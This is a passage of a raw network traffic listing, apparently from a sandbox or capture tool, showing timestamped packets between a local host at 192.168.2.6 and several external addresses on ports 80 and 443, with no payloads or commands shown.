Jul 2, 2024 00:05:08.001379013 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.001382113 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001391888 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001400948 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.001400948 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.001410007 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001420975 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001426935 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.001431942 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001441956 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001452923 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001456976 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.001456976 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.001463890 CEST	80	49725	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.001475096 CEST	80	49725	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.001483917 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001486063 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.001494884 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001504898 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001514912 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001524925 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001524925 CEST	49725	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.001534939 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.001578093 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.001578093 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.001990080 CEST	49725	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.002142906 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.002154112 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.002165079 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.002175093 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.002185106 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.002192020 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.002194881 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.002213001 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.002223015 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.002233028 CEST	80	49726	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.002243996 CEST	80	49726	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.002245903 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.002253056 CEST	80	49725	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.002259970 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.002262115 CEST	80	49726	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.002275944 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.002305031 CEST	49725	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.002305031 CEST	49726	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.002337933 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.002338886 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.002357960 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.002379894 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.002396107 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.002595901 CEST	49733	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.002904892 CEST	80	49728	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:08.002914906 CEST	80	49728	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:08.002923965 CEST	80	49728	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:08.002932072 CEST	80	49725	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.002939939 CEST	80	49726	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.002955914 CEST	49728	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:08.002964973 CEST	80	49728	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:08.002980947 CEST	49728	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:08.002981901 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.002993107 CEST	49725	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.002993107 CEST	49726	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.003000021 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.003007889 CEST	49728	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:08.003014088 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.003022909 CEST	80	49725	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.003032923 CEST	80	49726	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.003034115 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.003057003 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.003065109 CEST	80	49728	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:08.003082037 CEST	49725	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.003082037 CEST	49726	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.003102064 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.003112078 CEST	49728	80	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:08.005311012 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.005321980 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.005368948 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.005390882 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.005403996 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.005426884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.005438089 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.005450964 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.005501032 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.005511045 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.005522013 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.005562067 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.005562067 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.006419897 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.006504059 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.006525993 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.006578922 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.006793976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.006804943 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.006814957 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.006825924 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.006839037 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.006848097 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.006870031 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.006886005 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.011537075 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.011588097 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.011599064 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.011605024 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.011635065 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.011635065 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.011657000 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.011667013 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.011677980 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.011687994 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.011687994 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.011729002 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.011766911 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.011851072 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.011862040 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.011873007 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.011883020 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.011893988 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.011898994 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.011898994 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.011904001 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.011914015 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.011923075 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.011923075 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.011924982 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.011960983 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.011965990 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.012104988 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012115955 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012125969 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012135983 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012145996 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012155056 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012160063 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.012160063 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.012166023 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.012177944 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.012187958 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.012212038 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.012232065 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.012232065 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.012243986 CEST	443	49727	162.159.133.233	192.168.2.6
Jul 2, 2024 00:05:08.012310028 CEST	49727	443	192.168.2.6	162.159.133.233
Jul 2, 2024 00:05:08.012417078 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.012428999 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.012439013 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.012448072 CEST	80	49725	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.012471914 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.012473106 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.012537003 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012547016 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012557030 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012567043 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012590885 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.012590885 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.012603998 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.012622118 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.012633085 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.012641907 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.012651920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.012661934 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.012667894 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.012701035 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.012710094 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.012754917 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012764931 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012779951 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012794018 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012804031 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.012804031 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.012804985 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012814045 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.012815952 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012829065 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.012835026 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.012859106 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.012880087 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.012880087 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.012994051 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.013005018 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013015032 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013025045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013036013 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013046026 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013067007 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.013067007 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.013067961 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.013088942 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.013091087 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.013101101 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.013135910 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.013148069 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.013361931 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.013413906 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.013422012 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.013426065 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.013454914 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.013484001 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.013488054 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.013499975 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.013509989 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.013520956 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.013530016 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.013556957 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.013556957 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.013581991 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.013695002 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.013706923 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013715982 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013725996 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013736010 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013745070 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013753891 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.013756037 CEST	80	49733	87.240.132.78	192.168.2.6
Jul 2, 2024 00:05:08.013761997 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.013801098 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.013801098 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.013834000 CEST	49733	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.013904095 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013915062 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013926029 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013936043 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013947010 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.013981104 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.013981104 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.014012098 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.014023066 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.014031887 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.014040947 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.014051914 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.014055967 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.014062881 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.014092922 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.014092922 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.014113903 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.014292002 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.014302015 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.014312029 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.014322042 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.014333963 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.014339924 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.014350891 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.014379025 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.014607906 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.014617920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.014627934 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.014636993 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.014647007 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.014663935 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.014663935 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.014707088 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.014885902 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.014897108 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.014906883 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.014915943 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.014926910 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.014928102 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.014939070 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.014981031 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.014981031 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.014981985 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.014997005 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015018940 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015028954 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015038967 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015048981 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015053988 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.015053988 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.015059948 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015069962 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.015073061 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015084982 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015094042 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.015098095 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015109062 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015119076 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015122890 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.015124083 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.015163898 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.015163898 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.015367031 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.015417099 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.015422106 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.015433073 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.015449047 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.015459061 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.015481949 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.015507936 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.015512943 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.015523911 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.015533924 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.015542984 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.015568018 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.015585899 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.015602112 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.015647888 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.015695095 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015719891 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015731096 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015743017 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.015773058 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.015773058 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.015841007 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015852928 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015861988 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015872002 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.015889883 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.015908003 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.016000032 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016011000 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016021013 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016031027 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016045094 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.016046047 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.016072035 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.016072035 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.016216040 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.016226053 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.016236067 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.016246080 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.016256094 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.016259909 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.016266108 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.016284943 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.016294956 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.016375065 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.016464949 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.016475916 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.016494989 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.016505003 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.016513109 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.016515017 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.016531944 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.016558886 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.016582012 CEST	49714	80	192.168.2.6	77.105.133.27
